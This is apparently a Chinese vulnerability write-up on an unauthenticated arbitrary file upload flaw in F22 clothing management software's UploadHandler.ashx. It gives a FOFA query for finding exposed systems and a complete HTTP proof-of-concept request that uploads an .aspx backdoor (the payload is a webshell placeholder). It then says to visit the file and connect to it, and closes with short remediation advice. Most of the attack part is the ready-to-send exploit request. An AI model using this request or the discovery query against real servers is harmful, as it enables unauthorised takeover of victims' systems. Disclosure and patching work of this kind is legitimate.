0x01 产品简介
F22服装管理软件系统是广州锦铭泰软件科技有限公司一款专为服装行业开发的综合性管理软件。该产品旨在帮助服装企业实现全面、高效的管理,提升生产效率和经营效益。
0x02 漏洞概述
F22服装管理软件系统UploadHandler.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件控制服务器。
0x03 复现环境
FOFA:body="F22WEB登陆"
0x04 漏洞复现
PoC
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: your-ip
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="folder"
/upload/udplog
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
马子
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1
Content-Disposition: form-data; name="Upload"
Submit Query
------------ae0KM7Ef1KM7cH2ae0GI3ae0gL6Ef1--
验证url
http://your-ip/upload/udplog/回显的文件名
尝试连接
0x05 修复建议
配置访问控制策略:对路径 /CuteSoft_Client/UploadHandler.ashx 进行限制访问
联系厂商获取最新补丁信息:http://www.x2erp.com/
白名单检查文件扩展名